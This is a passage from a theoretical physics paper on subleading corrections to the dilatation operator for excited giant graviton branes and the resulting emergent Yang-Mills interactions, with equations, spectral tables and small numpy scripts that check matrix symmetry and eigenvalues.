&D_{21} O_{(\xi_0,\xi_1)\gamma\gamma}((12),1)=2\left[ -(C_0+C_1)O_{(\xi_0,\xi_1)\gamma\gamma}((12),1) \right.\\
&\left.+\sqrt{C_0C_1}O_{(\xi_0+1,\xi_1-2)\gamma\gamma}((12),1)+\sqrt{C_0C_1}O_{(\xi_0-1,\xi_1+2)\gamma\gamma}((12),1)\right]
\end{aligned}
\end{equation}
\begin{equation}
\begin{aligned}
&D_{21} O_{(\xi_0,\xi_1)\gamma\gamma}((12),(12))=2\left[ -(C_0+C_1)O_{(\xi_0,\xi_1)\gamma\gamma}((12),(12)) \right.\\
&\left.+\sqrt{C_0C_1}O_{(\xi_0+1,\xi_1-2)\gamma\gamma}((12),(12))+\sqrt{C_0C_1}O_{(\xi_0-1,\xi_1+2)\gamma\gamma}((12),(12))\right]
\end{aligned}
\end{equation}
\begin{equation}
\begin{aligned}
&D_{21} O_{(\xi_0,\xi_1)\gamma\beta}((12),1)=2\left[ -(C_0+C_1)O_{(\xi_0,\xi_1)\gamma\beta}((12),1) \right.\\
&\left.+\sqrt{C_0C_1}O_{(\xi_0+1,\xi_1-2)\gamma\beta}((12),1)+\sqrt{C_0C_1}O_{(\xi_0-1,\xi_1+2)\gamma\beta}((12),1)\right]
\end{aligned}
\end{equation}
The result of the action of $D_{32}$ in the Gauss graph basis reads
\begin{equation}\label{comparision eq1}
\begin{aligned}
D_{32}O_{(\xi_0,\xi_1)\gamma\alpha}((12),1)&=\frac{4C_1}{\xi_0}O_{(\xi_0,\xi_1)\gamma\alpha}((12),1)\\
&-\frac{2\sqrt{2}\sqrt{C_0C_1}}{\xi_0}O_{(\xi_0,\xi_1)\gamma\gamma}((12),1)\\
\end{aligned}
\end{equation}
\begin{equation}
\begin{aligned}
D_{32}O_{(\xi_0,\xi_1)\alpha\gamma}(1,(12))&=\frac{4C_1}{\xi_0}O_{(\xi_0,\xi_1)\alpha\gamma}(1,(12))\\
&-\frac{2\sqrt{2}\sqrt{C_0C_1}}{\xi_0}O_{(\xi_0,\xi_1)\gamma\gamma}(1,(12))\\
\end{aligned}
\end{equation}
\begin{equation}
\begin{aligned}
D_{32}O_{(\xi_0,\xi_1)\gamma\gamma}(1,(12))&=\frac{2(C_0+C_1)}{\xi_0}O_{(\xi_0,\xi_1)\gamma\gamma}(1,(12))\\
&-\frac{2\sqrt{2}\sqrt{C_0C_1}}{\xi_0}O_{(\xi_0,\xi_1)\alpha\gamma}(1,(12))\\
&-\frac{2\sqrt{2}\sqrt{C_0C_1}}{\xi_0}O_{(\xi_0,\xi_1)\beta\gamma}(1,(12))\\
\end{aligned}
\end{equation}
\begin{equation}
\begin{aligned}
D_{32}O_{(\xi_0,\xi_1)\gamma\gamma}((12),1)&=\frac{2(C_0+C_1)}{\xi_0}O_{(\xi_0,\xi_1)\gamma\gamma}((12),1)\\
&-\frac{2\sqrt{2}\sqrt{C_0C_1}}{\xi_0}O_{(\xi_0,\xi_1)\gamma\alpha}((12),1)\\
&-\frac{2\sqrt{2}\sqrt{C_0C_1}}{\xi_0}O_{(\xi_0,\xi_1)\gamma\beta}((12),1)\\
\end{aligned}
\end{equation}
\begin{equation}
\begin{aligned}
D_{32}O_{(\xi_0,\xi_1)\gamma\gamma}((12),(12))&=\frac{2(C_0+C_1)}{\xi_0}O_{(\xi_0,\xi_1)\gamma\gamma}((12),(12))\\
\end{aligned}
\end{equation}
\begin{equation}
\begin{aligned}
D_{32}O_{(\xi_0,\xi_1)\beta\gamma}(1,(12))&=\frac{4C_0}{\xi_0}O_{(\xi_0,\xi_1)\beta\gamma}(1,(12))\\
&-\frac{2\sqrt{2}\sqrt{C_0C_1}}{\xi_0}O_{(\xi_0,\xi_1)\gamma\gamma}(1,(12))\\
\end{aligned}
\end{equation}
\begin{equation}
\begin{aligned}
D_{32}O_{(\xi_0,\xi_1)\gamma\beta}((12),1)&=\frac{4C_0}{\xi_0}O_{(\xi_0,\xi_1)\gamma\beta}((12),1)\\
&-\frac{2\sqrt{2}\sqrt{C_0C_1}}{\xi_0}O_{(\xi_0,\xi_1)\gamma\gamma}((12),1)\\
\end{aligned}
\end{equation}
Each of the above operators is normalized. This result is in perfect agreement with the analytic formulas given in equations (\ref{D31,D21 in Gauss graph basis}) and $(\ref{M32 in Gauss graph basis})$, providing a highly non-trivial check of our computation. We are now ready to extract the subleading corrections to the above results.
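As a check of the evenly spaced spectrum advertised at the start of this section, consider e.g. the sector spanned by $O_{(\xi_0,\xi_1)\gamma\alpha}((12),1)$, $O_{(\xi_0,\xi_1)\gamma\gamma}((12),1)$ and $O_{(\xi_0,\xi_1)\gamma\beta}((12),1)$. In the strict large $N$ limit ($C_1\rightarrow C_0$) the matrix elements above organize into $\frac{2C_0}{\xi_0}$ times a fixed $3\times3$ matrix, whose eigenvalues we can compute numerically (our own check):

```python
import numpy as np

# Matrix of the leading D_32 in the basis
# {O_{gamma alpha}((12),1), O_{gamma gamma}((12),1),
#  O_{gamma beta}((12),1)}, with C1 -> C0 and the overall
# factor 2*C0/xi_0 stripped off:
r2 = np.sqrt(2.0)
M = np.array([[2.0, -r2, 0.0],
              [-r2, 2.0, -r2],
              [0.0, -r2, 2.0]])

evals = np.linalg.eigvalsh(M)
print(evals)   # eigenvalues 0, 2, 4 (up to rounding): evenly spaced
```

Restoring the overall factor, the levels are $0$, $4C_0/\xi_0$ and $8C_0/\xi_0$, with spacing $4C_0/\xi_0$, which is of order 1 at large $N$ since $\xi_0\sim N$.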
\subsection{The Subleading Interaction}\label{sbldin}
Our main interest in this section is the subleading contribution to the action of $D_{32}$, which describes interactions of the excitations of the branes, given by the edges of the Gauss graphs. The leading order result is expected to have the form given in equation (\ref{M32 in Gauss graph basis}), which has been argued to arise from the interaction Hamiltonian $\text{Tr}\left([\bar{b}, \bar{a}][a, b]\right)$. Our analytic calculation has verified this expectation.
We will now relax the strict displaced corners limit and evaluate the first corrections that appear. Of course, by moving further and further from the displaced corners limit we will reach a point where our formulas break down and the Gauss graph operators are no longer well defined. However, close to the displaced corners limit we expect our description to remain sensible, essentially because we have confirmed the duality between our dilatation operator and a system of giant graviton branes, which admits a nice semi-classical description in terms of branes excited by open strings.
We now proceed to calculate the subleading correction to $D_{32}$. Our two giant graviton system again provides the simplest possible setting for this task. The subleading correction is obtained by expanding the matrix elements of $D_{32}$ in powers of $\frac{1}{\xi_1}$ around $\xi_1=\infty$ and retaining terms of order $\mathcal{O}(\frac{1}{\xi_1})$. We assume that we are in the strict large $N$ limit, so that we may set $C_1\rightarrow C_0$. This expansion yields
%
\begin{equation}
D_{32}=D_{32}^{(0)}+\frac{C_0}{\xi_0 \xi_1}D_{32}^{(1)}
\end{equation}
%
The action of $D_{32}^{(0)}$ is the leading action of the dilatation operator, given in the previous section.
The subleading correction we obtain is shown in what follows
\begin{equation}
\begin{aligned}
&D_{32}^{(1)}O_{(\xi_0,\xi_1)\alpha\alpha}(1,1)=0
\end{aligned}
\end{equation}
{\vskip 0.3cm}
\begin{equation}
\begin{aligned}
D_{32}^{(1)}O_{(\xi_0,\xi_1)\gamma\alpha}(1,1)&=-4O_{(\xi_0,\xi_1)\alpha\gamma}(1,(12))\\
& +2\sqrt{2}O_{(\xi_0,\xi_1)\gamma\gamma}(1,(12))\\
\end{aligned}
\end{equation}
{\vskip 0.3cm}
\begin{equation}\label{Ogammaalpha121}
\begin{aligned}
&D_{32}^{(1)}O_{(\xi_0,\xi_1)\gamma\alpha}((12),1)=-4O_{(\xi_0,\xi_1)\gamma\alpha}((12),1)\\
\end{aligned}
\end{equation}
{\vskip 0.3cm}
\begin{equation}
\begin{aligned}
D_{32}^{(1)}O_{(\xi_0,\xi_1)\beta\alpha}(1,1)&=-4O_{(\xi_0,\xi_1)\gamma\gamma}(1,(12))\\
&+4\sqrt{2}O_{(\xi_0,\xi_1)\beta\gamma}(1,(12))
\end{aligned}
\end{equation}
{\vskip 0.3cm}
\begin{equation}
\begin{aligned}
D_{32}^{(1)}O_{(\xi_0,\xi_1)\alpha\gamma}(1,1)&=4O_{(\xi_0,\xi_1)\alpha\gamma}(1,(12))\\
&-2\sqrt{2}O_{(\xi_0,\xi_1)\gamma\gamma}(1,(12))
\end{aligned}
\end{equation}
{\vskip 0.3cm}
\begin{equation}
\begin{aligned}
D_{32}^{(1)}O_{(\xi_0,\xi_1)\alpha\gamma}(1,(12))&=-4O_{(\xi_0,\xi_1)\gamma\alpha}(1,1) \\
&+4O_{(\xi_0,\xi_1)\alpha\gamma}(1,1)\\
&+4O_{(\xi_0,\xi_1)\alpha\gamma}(1,(12)) \\
&+2\sqrt{2}O_{(\xi_0,\xi_1)\gamma\gamma}(1,1)\\
&+2\sqrt{2}O_{(\xi_0,\xi_1)\gamma\gamma}((12),(12))\\
&-4\sqrt{2}O_{(\xi_0,\xi_1)\alpha\beta}(1,1)\\
\end{aligned}
\end{equation}
{\vskip 0.3cm}
\begin{equation}
\begin{aligned}
D_{32}^{(1)}O_{(\xi_0,\xi_1)\gamma\gamma}(1,1)&=2\sqrt{2}O_{(\xi_0,\xi_1)\alpha\gamma}(1,(12))\\
&-2\sqrt{2}O_{(\xi_0,\xi_1)\beta\gamma}(1,(12))\\
\end{aligned}
\end{equation}
{\vskip 0.3cm}
\begin{equation}
\begin{aligned}
D_{32}^{(1)}O_{(\xi_0,\xi_1)\gamma\gamma}(1,(12))&=2\sqrt{2}O_{(\xi_0,\xi_1)\gamma\alpha}(1,1)\\
&-2\sqrt{2}O_{(\xi_0,\xi_1)\alpha\gamma}(1,1)\\
&-4O_{(\xi_0,\xi_1)\beta\alpha}(1,1)\\
&+4O_{(\xi_0,\xi_1)\alpha\beta}(1,1)\\
&+2\sqrt{2}O_{(\xi_0,\xi_1)\beta\gamma}(1,1)\\
&-2\sqrt{2}O_{(\xi_0,\xi_1)\gamma\beta}(1,1)\\
\end{aligned}
\end{equation}
{\vskip 0.3cm}
\begin{equation}
\begin{aligned}
D_{32}^{(1)}O_{(\xi_0,\xi_1)\gamma\gamma}((12),1)&=0
\end{aligned}
\end{equation}
{\vskip 0.3cm}
\begin{equation}
\begin{aligned}
D_{32}^{(1)}O_{(\xi_0,\xi_1)\gamma\gamma}((12),(12))&=2\sqrt{2}O_{(\xi_0,\xi_1)\alpha\gamma}(1,(12))\\
&-2\sqrt{2}O_{(\xi_0,\xi_1)\beta\gamma}(1,(12))\\
\end{aligned}
\end{equation}
{\vskip 0.3cm}
\begin{equation}
\begin{aligned}
D_{32}^{(1)}O_{(\xi_0,\xi_1)\beta\gamma}(1,1)&=2\sqrt{2}O_{(\xi_0,\xi_1)\gamma\gamma}(1,(12))\\
&-4O_{(\xi_0,\xi_1)\beta\gamma}(1,(12))
\end{aligned}
\end{equation}
{\vskip 0.3cm}
\begin{equation}
\begin{aligned}
D_{32}^{(1)}O_{(\xi_0,\xi_1)\beta\gamma}(1,(12))&=4\sqrt{2}O_{(\xi_0,\xi_1)\beta\alpha}(1,1)\\
&-2\sqrt{2}O_{(\xi_0,\xi_1)\gamma\gamma}(1,1)\\
&-2\sqrt{2}O_{(\xi_0,\xi_1)\gamma\gamma}((12),(12))\\
&-4O_{(\xi_0,\xi_1)\beta\gamma}(1,1)\\
&-4O_{(\xi_0,\xi_1)\beta\gamma}(1,(12))\\
&+4O_{(\xi_0,\xi_1)\gamma\beta}(1,1)\\
\end{aligned}
\end{equation}
{\vskip 0.3cm}
\begin{equation}
\begin{aligned}
D_{32}^{(1)}O_{(\xi_0,\xi_1)\alpha\beta}(1,1)&=-4\sqrt{2}O_{(\xi_0,\xi_1)\alpha\gamma}(1,(12))\\
&+4O_{(\xi_0,\xi_1)\gamma\gamma}(1,(12))
\end{aligned}
\end{equation}
{\vskip 0.3cm}
\begin{equation}
\begin{aligned}
D_{32}^{(1)}O_{(\xi_0,\xi_1)\gamma\beta}(1,1)&=-2\sqrt{2}O_{(\xi_0,\xi_1)\gamma\gamma}(1,(12))\\
&+4O_{(\xi_0,\xi_1)\beta\gamma}(1,(12))\\
\end{aligned}
\end{equation}
{\vskip 0.3cm}
\begin{equation}
\begin{aligned}
D_{32}^{(1)}O_{(\xi_0,\xi_1)\gamma\beta}((12),1)&=4O_{(\xi_0,\xi_1)\gamma\beta}((12),1)\\
\end{aligned}
\end{equation}
{\vskip 0.3cm}
\begin{equation}
\begin{aligned}
D_{32}^{(1)}O_{(\xi_0,\xi_1)\beta\beta}(1,1)&=0\\
\end{aligned}
\end{equation}
{\vskip 0.3cm}
The fact that the matrix of this subleading correction is symmetric implies that all corrections to the anomalous dimensions are real, as they must be. To interpret this result, it is necessary to write it in terms of the oscillators of the emergent gauge theory. Remarkably, this can be done, and one finds that the following interaction term, written in terms of oscillators, reproduces the matrix elements of the subleading action of $D_{32}$
\begin{equation}
\begin{aligned}
D_{32}^{(1)}=2{\rm Tr}&\Big(\sigma_z \left(\bar{b}_2 b_2 \bar{b}_3 b_3 \bar{b}_3 b_3 + \bar{b}_3 \bar{b}_2 b_2 \bar{b}_3 b_3 b_3 + \bar{b}_3 \bar{b}_3 b_3 \bar{b}_2 b_2 b_3-\bar{b}_2 \bar{b}_3 b_2 \bar{b}_3 b_3 b_3 \right.\\
&\left. -\bar{b}_3 \bar{b}_2 b_3 \bar{b}_3 b_2 b_3 - \bar{b}_3 \bar{b}_3 b_3 \bar{b}_2 b_3 b_2 +\bar{b}_2 \bar{b}_2 \bar{b}_3 b_3 b_2 b_2 - \bar{b}_2 \bar{b}_2 b_2 b_2 \hat{n}_3 \right)\Big)\\
+2{\rm Tr}&\Big(\sigma_x\sigma_z\left(\hat{n}_2\bar{b}_3\bar{b}_3b_3b_3-\bar{b}_3\bar{b}_3b_3b_3\hat{n}_2 +\bar{b}_3\bar{b}_3b_3\hat{n}_2b_3 -\bar{b}_3\hat{n}_2\bar{b}_3b_3b_3 \right)\Big)\\
-4{\rm Tr}&\Big(\sigma_x\hat{n}_2\sigma_z\hat{n}_3\Big)
\end{aligned}\label{subint}
\end{equation}
where we have used the usual Pauli matrices
$$
\sigma_z=\left[\begin{matrix} 1 &0\\ 0 &-1\end{matrix}\right]\qquad
\sigma_x=\left[\begin{matrix} 0 &1\\ 1 &0\end{matrix}\right]
$$
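Since the matrix elements of $D_{32}^{(1)}$ are listed explicitly above, the symmetry claim can be checked directly. The following sketch assembles the listed coefficients into a matrix and verifies that it is symmetric with a real spectrum; the basis labels (e.g.\ \texttt{ga\_1\_12} for $O_{(\xi_0,\xi_1)\gamma\alpha}((12),1)$) are our own shorthand.

```python
import numpy as np

r2 = np.sqrt(2.0)
# Shorthand: "ga_1_1" stands for O_{(xi0,xi1) gamma alpha}(1,1), etc.
basis = ["aa_1_1", "ga_1_1", "ga_12_1", "ba_1_1", "ag_1_1", "ag_1_12",
         "gg_1_1", "gg_1_12", "gg_12_1", "gg_12_12", "bg_1_1", "bg_1_12",
         "ab_1_1", "gb_1_1", "gb_12_1", "bb_1_1"]
idx = {b: i for i, b in enumerate(basis)}

# Image of each basis operator under D32^(1), copied from the listing above.
action = {
    "aa_1_1":   {},
    "ga_1_1":   {"ag_1_12": -4, "gg_1_12": 2 * r2},
    "ga_12_1":  {"ga_12_1": -4},
    "ba_1_1":   {"gg_1_12": -4, "bg_1_12": 4 * r2},
    "ag_1_1":   {"ag_1_12": 4, "gg_1_12": -2 * r2},
    "ag_1_12":  {"ga_1_1": -4, "ag_1_1": 4, "ag_1_12": 4,
                 "gg_1_1": 2 * r2, "gg_12_12": 2 * r2, "ab_1_1": -4 * r2},
    "gg_1_1":   {"ag_1_12": 2 * r2, "bg_1_12": -2 * r2},
    "gg_1_12":  {"ga_1_1": 2 * r2, "ag_1_1": -2 * r2, "ba_1_1": -4,
                 "ab_1_1": 4, "bg_1_1": 2 * r2, "gb_1_1": -2 * r2},
    "gg_12_1":  {},
    "gg_12_12": {"ag_1_12": 2 * r2, "bg_1_12": -2 * r2},
    "bg_1_1":   {"gg_1_12": 2 * r2, "bg_1_12": -4},
    "bg_1_12":  {"ba_1_1": 4 * r2, "gg_1_1": -2 * r2, "gg_12_12": -2 * r2,
                 "bg_1_1": -4, "bg_1_12": -4, "gb_1_1": 4},
    "ab_1_1":   {"ag_1_12": -4 * r2, "gg_1_12": 4},
    "gb_1_1":   {"gg_1_12": -2 * r2, "bg_1_12": 4},
    "gb_12_1":  {"gb_12_1": 4},
    "bb_1_1":   {},
}

M = np.zeros((len(basis), len(basis)))
for col, images in action.items():
    for row, val in images.items():
        M[idx[row], idx[col]] = val

assert np.allclose(M, M.T)                          # symmetric mixing matrix
assert np.allclose(np.linalg.eigvals(M).imag, 0.0)  # hence real spectrum
```

Every off-diagonal coefficient is matched by its transpose partner, confirming the symmetry stated above.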
By identifying $\bar{b},b$ with $\bar{b}_3,b_3$ and $\bar{a},a$ with $\bar{b}_2,b_2$, as we did in the previous section, the above formula gives the interactions of the emergent Yang-Mills theory.
The emergent Yang-Mills theory lives on the world volume of two giant graviton branes, so the gauge group is U(2).
These branes have different radii, implying that the open strings stretching between the branes are massive. The strings stretching from a giant graviton brane back to the same brane remain massless. Thus, the emergent gauge theory is on the Coulomb branch and the U(2) gauge symmetry is broken to U(1)$\times$U(1). Under this gauge group we find
%
\begin{equation}
b_2\to e^{i\theta_1}b_2\qquad b_3\to e^{i\theta_2}b_3 \qquad \hat{n}_2\to\hat{n}_2\qquad \hat{n}_3\to\hat{n}_3
\end{equation}
It is not hard to check that (\ref{subint}) is indeed invariant under these U(1)$\times$U(1) transformations.
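The invariance can be seen term by term: every term in (\ref{subint}) contains equal numbers of barred and unbarred oscillators of each species, so all phases cancel. For example,
\begin{equation}
\bar{b}_2 b_2\,\bar{b}_3 b_3\,\bar{b}_3 b_3 \;\to\; \left(e^{-i\theta_1}e^{i\theta_1}\right)\left(e^{-2i\theta_2}e^{2i\theta_2}\right)\bar{b}_2 b_2\,\bar{b}_3 b_3\,\bar{b}_3 b_3 = \bar{b}_2 b_2\,\bar{b}_3 b_3\,\bar{b}_3 b_3
\end{equation}
and similarly for every other term, while the number operators $\hat{n}_2$ and $\hat{n}_3$ are manifestly invariant.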
At leading order, the mixing is between $\phi_1$ and $\phi_2$, as well as between $\phi_1$ and $\phi_3$. This mixing is diagonalized by the Gauss graph operators. The leading contribution to the mixing involving $\phi_2$ and $\phi_3$ weakly mixes operators labeled by distinct Gauss graphs: two operators can only mix if they differ, at most, by the placement of a single edge that has both end points attached to a single node. The interaction in (\ref{subint}) allows graphs to mix even if this involves rearranging open edges. In Figure \ref{fig:gauss-graphs} below we have shown four pairs of graphs that are mixed by (\ref{subint}), but are not mixed by the leading contribution to the mixing involving $\phi_2$ and $\phi_3$. The interaction allows both the movement of closed loop edges from one node to another, as well as the rearrangement of closed loop edges with both ends at the same node into open edges that have their endpoints at different nodes.
\begin{figure}[h]
\centering
\includegraphics[width=1.0\linewidth]{"Gauss_graphs.pdf"}
\caption{Each pair of graphs shown is mixed by (\ref{subint}), but is not mixed by the leading contribution to the mixing involving $\phi_2$ and $\phi_3$. The edges for $\phi_{2}$ are colored red, while edges for $\phi_{3}$ are colored black.}
\label{fig:gauss-graphs}
\end{figure}
\subsection{Numerical Spectra}
In this subsection, we discuss the eigenvalues of $D_{32}$, which is the Hamiltonian describing the interactions of the excitations. Let $n_T$ denote the total number of boxes in $R$, while $N$ is the rank of the gauge group as usual. The bounds on $n_T$ are as follows
\begin{equation}
N<n_T<2N
\end{equation}
The lower limit sets the smallest possible radius for the giants in the two giant graviton system. This corresponds to the case in which each column has $N/2$ boxes, so that both giants still have a macroscopic size. The upper limit reflects the restriction that the number of rows must be less than $N$, since the Young diagrams we consider have only two columns.
These bounds also agree with the fact that we are considering operators of dimension $\sim N$, so that the Young diagrams labeling them have $\sim N$ boxes.
It is easy to verify that $D_{32}$, $D_{31}$ and $D_{21}$ commute, so that it is sensible to consider the spectrum of each of them separately. Before considering the spectrum of $D_{32}$, consider the spectra of $D_{31}$ and $D_{21}$. Examples of spectra are given in Fig.~\ref{fig:leading-d31-d21-nt399004-n200000-v1}. They show that the system is a harmonic oscillator with a high energy cutoff, in perfect agreement with the results of \cite{2010Emergentthree}.
\begin{figure}[h]
\centering
\includegraphics[width=1.0\linewidth]{"leading_D31_D21_n_T=399004_N=200000_v1.pdf"}
\caption{The first plot is the spectrum of the leading action of $D_{31}$, while the second plot is that of $D_{21}$. Each spectrum is calculated in the system with $n_T=399004$ and $N=200000$.}
\label{fig:leading-d31-d21-nt399004-n200000-v1}
\end{figure}
Now consider the spectrum of the leading contribution to $D_{32}$. Again the spectrum is very similar to that of the oscillator, i.e., it consists of evenly spaced energy levels. The fact that there are only three levels is also not surprising: it reflects the fact that each operator is constructed using only two $\phi_2$ fields and two $\phi_3$ fields. See Figure \ref{fig:leading-spectrum01} for some examples of typical spectra. This sets the contribution to the energy levels of the system.
\begin{figure}[h]
\centering
\includegraphics[width=1.0\linewidth]{"leading_spectrum_01.pdf"}
\caption{The parameters $n_T$ and $N$ of the system are shown above each spectrum. It is easy to verify that the intervals between adjacent energy levels are constant in each spectrum.}
\label{fig:leading-spectrum01}
\end{figure}
\begin{table}[h]
\centering
\begin{tabular}{|l|l|l|l|}
\hline
$(N,n_T)$& $D_0$ & $D_1$ & $D_2$ \\ \hline
(200000,399004)& 5476 & 1495 & 994 \\ \hline
(199700,399204)& 4046 & 1105 & 734 \\ \hline
(300222,599444)& 5498 & 1501 & 998 \\ \hline
(379518,758546)& 2696 & 736 & 488 \\ \hline
\end{tabular}
\caption{The table presents the degeneracies of the energy levels of each spectrum shown in Figure \ref{fig:leading-spectrum01}. The pairs of parameters $N$ and $n_T$ used to compute each spectrum appear in the first column, while the degeneracies of the corresponding energy levels are shown in the last three columns. The notations $D_0, D_1, D_2$ denote the degeneracies of the energy levels $0, E^{(0)}, 2E^{(0)}$, respectively.}
\label{table: degeneracies}
\end{table}
The complete spectrum takes the form $0,E^{(0)},2E^{(0)}$, with the size of $E^{(0)}$ set by the formula (where $\xi_{1,\text{max}}=2N-n_T$)
\begin{equation}\label{E0 of N and nT}
E^{(0)}=2\left( \frac{N}{n_T-N}-1 \right) =2\frac{\xi_{1,\text{max}}}{N-\xi_{1,\text{max}}}
\end{equation}
Notice that $E^{(0)}$ is an order 1 number as we take $N\to\infty$. Some numerical results for $E^{(0)}$ are shown in Table \ref{table: E0}. A simple check shows that formula \eqref{E0 of N and nT} is in perfect agreement with these numerical results, to an accuracy of $1\times10^{-4}$. To facilitate the study of the spectrum of the system, in Table \ref{table: degeneracies} we also present the degeneracies of the energy levels shown in Figure \ref{fig:leading-spectrum01}. All degeneracies listed in the table are exact to the precision we use, except for the second level $2E^{(0)}=0.0200$ of the spectrum computed with parameters $N=200000,n_T=399004$. We find 796 states of energy 0.0200 and 198 states of energy 0.0201. Since this deviation is rather small, we still take the second level of this spectrum to be 0.0200. In fact, the average energy of these $796+198$ states is 0.0200, as we expect.
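The quoted agreement is easy to reproduce; a small check of formula \eqref{E0 of N and nT} against a few of the $(N, n_T)$ pairs in Table \ref{table: E0} (whose entries are rounded to four decimal places):

```python
# Check E0 = 2*(N/(n_T - N) - 1) against tabulated values of E^(0),
# which are rounded to four decimal places.
cases = [(200100, 399004, 0.0120), (200000, 399004, 0.0100),
         (199850, 399004, 0.0070), (300100, 599004, 0.0080),
         (200000, 399804, 0.0020), (379518, 758546, 0.0026)]
for N, nT, tabulated in cases:
    E0 = 2.0 * (N / (nT - N) - 1.0)
    assert abs(E0 - tabulated) < 5e-5           # agrees within rounding
    xi1_max = 2 * N - nT                        # equivalent form of E0
    assert abs(E0 - 2.0 * xi1_max / (N - xi1_max)) < 1e-12
```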
Now consider the contribution to the spectrum coming from the subleading corrections. An example is given in Fig.~\ref{fig:subleading-exact-spectrum-nt399004-n200000011}. Comparing it with the leading spectrum shown in Figure \ref{fig:leading-spectrum01}, we see that the subleading corrections give a very small correction to the leading energy levels. Based on this numerical evidence, we conclude that our expansion converges very rapidly. Again, in Table \ref{table: subleading degeneracies} we show the degeneracies of the dominant energy levels in Figure \ref{fig:subleading-exact-spectrum-nt399004-n200000011}. There is also a relatively small number of states of energy 0.0201 in each spectrum, but the average energy is still 0.0200 when these are included together with the states of energy 0.0200.
\begin{table}[h]
\centering
\begin{tabular}{|l|l|l|l|l|l|l|}
\cline{1-3} \cline{5-7}
$N$ & $n_T$ & $E^{(0)}$ & & $N$ & $n_T$ & $E^{(0)}$ \\ \cline{1-3} \cline{5-7}
200100 & 399004 & 0.0120 & & 300100 & 599004 & 0.0080 \\ \cline{1-3} \cline{5-7}
200000 & 399004 & 0.0100 & & 299850 & 599004 & 0.0047 \\ \cline{1-3} \cline{5-7}
199976 & 399004 & 0.0095 & & 299600 & 599004 & 0.0013 \\ \cline{1-3} \cline{5-7}
199850 & 399004 & 0.0070 & & 400100 & 799004 & 0.0060 \\ \cline{1-3} \cline{5-7}
199720 & 399004 & 0.0044 & & 399850 & 799004 & 0.0035 \\ \cline{1-3} \cline{5-7}
\multicolumn{1}{|c|}{199600} & 399004 & 0.0020 & & 399600 & 799004 & 0.0010 \\ \cline{1-3} \cline{5-7}
200000 & 398804 & 0.0120 & & 199970 & 399204 & 0.0074 \\ \cline{1-3} \cline{5-7}
200000 & 399052 & 0.0095 & & 200100 & 399350 & 0.0085 \\ \cline{1-3} \cline{5-7}
200000 & 399304 & 0.0070 & & 300222 & 599444 & 0.0067 \\ \cline{1-3} \cline{5-7}
200000 & 399564 & 0.0044 & & 300288 & 599444 & 0.0076 \\ \cline{1-3} \cline{5-7}
200000 & 399804 & 0.0020 & & 379518 & 758546 & 0.0026 \\ \cline{1-3} \cline{5-7}
\end{tabular}
\caption{The table shows our numerical results for $E^{(0)}$, solved with different parameters $N$ and $n_T$.}
\label{table: E0}
\end{table}
\begin{figure}[h]
\centering
\includegraphics[width=1.0\linewidth]{"subleading_exact_spectrum_n_T=399004_N=200000_01_v1.pdf"}
\caption{The spectra are calculated in the system with $n_T=399004$ and $N=200000$. The first plot is the spectrum of the action with subleading corrections, while the second one is that of the exact action. The new energies caused by the subleading corrections are 0.0134 and 0.0192, since 0.0156 and 0.0163 can also be found, within acceptable errors, in the spectrum of the leading action shown in Fig.~\ref{fig:leading-spectrum01}.}
\label{fig:subleading-exact-spectrum-nt399004-n200000011}
\end{figure}
\begin{table}[h]
\centering
Subleading
\begin{tabular}{cccc}
\hline
\multicolumn{1}{|c|}{energy level} & \multicolumn{1}{c|}{0.0000} & \multicolumn{1}{c|}{0.0100} & \multicolumn{1}{c|}{0.0200} \\ \hline
\multicolumn{1}{|c|}{degeneracy} & \multicolumn{1}{c|}{5472} & \multicolumn{1}{c|}{1283} & \multicolumn{1}{c|}{986} \\ \hline
\end{tabular}
{\vskip 0.2cm}
Exact
{\vskip 0.1cm}
\begin{tabular}{cccc}
\hline
\multicolumn{1}{|c|}{energy level} & \multicolumn{1}{c|}{0.0000} & \multicolumn{1}{c|}{0.0100} & \multicolumn{1}{c|}{0.0200} \\ \hline
\multicolumn{1}{|c|}{degeneracy} & \multicolumn{1}{c|}{5475} & \multicolumn{1}{c|}{1289} & \multicolumn{1}{c|}{983} \\ \hline
\end{tabular}
\caption{The tables present the degeneracies of the dominant energy levels in the spectra shown in Figure \ref{fig:subleading-exact-spectrum-nt399004-n200000011}, which are calculated with parameters $n_T=399004$ and $N=200000$. Data for the subleading order action is shown in the upper table, while that for the exact action is shown in the lower table.}
\label{table: subleading degeneracies}
\end{table}
\section{Discussion}\label{discuss}
In this article we have evaluated subleading, in $1/N$, corrections to the dilatation operator. This was done by performing an exact analytic evaluation of the one loop mixing between three complex scalar fields, $\phi_1$, $\phi_2$ and $\phi_3$. The operators which mix are constructed using a very large number of $\phi_1$ fields and much fewer $\phi_2$ and $\phi_3$ fields. These operators correspond to excited giant graviton branes, with the $\phi_2,\phi_3$ describing the open string excitations of the branes. The low energy world volume dynamics of the branes is an emergent super Yang-Mills theory. Our computation has allowed us to evaluate interactions appearing in this emergent gauge theory.
Our exact evaluation gives a detailed formula for the matrix elements of the dilatation operator. This formula has passed a number of non-trivial tests, giving us confidence in the result. First, the terms mixing $\phi_1$ and $\phi_2$ and the terms mixing $\phi_1$ and $\phi_3$ are in complete agreement with the results obtained in \cite{2010Emergentthree,2011Surprisingly}. Secondly, the transformation of the dilatation operator to the Gauss graph basis gives formulas in our example that are in complete agreement with the general formulas obtained in \cite{2012Adoublecosetansatz}. Finally, the leading terms mixing $\phi_2$ and $\phi_3$ are in complete agreement with the formulas derived in \cite{2020EmergentYangMills}. By expanding our exact result to the next subleading order, we have obtained the result (\ref{subint}), which is the main result of this paper.
The formula (\ref{subint}) represents interactions in the emergent Yang-Mills theory. The leading contribution to operator mixing comes from the mixing between $\phi_1$ and $\phi_2$ fields, and the mixing between $\phi_1$ and $\phi_3$ fields. This mixing is diagonalized by the Gauss graph operators. The next correction to operator mixing comes from the mixing between $\phi_2$ and $\phi_3$ fields. In the Gauss graph basis this mixing allows Gauss graphs to mix if they differ in the placement of a single closed edge on the graph. The corresponding operators have equal dimensions, so that although this mixes operators with degenerate scaling dimensions, there is no correction to the spectrum of anomalous dimensions. The formula (\ref{subint}) gives a mixing between operators that have different dimensions, and consequently it will have a non-trivial effect on the spectrum of operator dimensions.
There are a number of ways in which the study of this article can be extended. In the planar limit, arguments exploiting global symmetries were very helpful in constraining the form of the dilatation operator \cite{2004TheDynamicSpin,2008TheSu(2|2)Dynamic}. Similar computations relevant to our study include \cite{2012FromLargeN,2015RelationBetweenLargeDimension,2014HigherLoopNonplanar,2021OscillatingMultipleGiants,2011NonplanarIntegrability}.
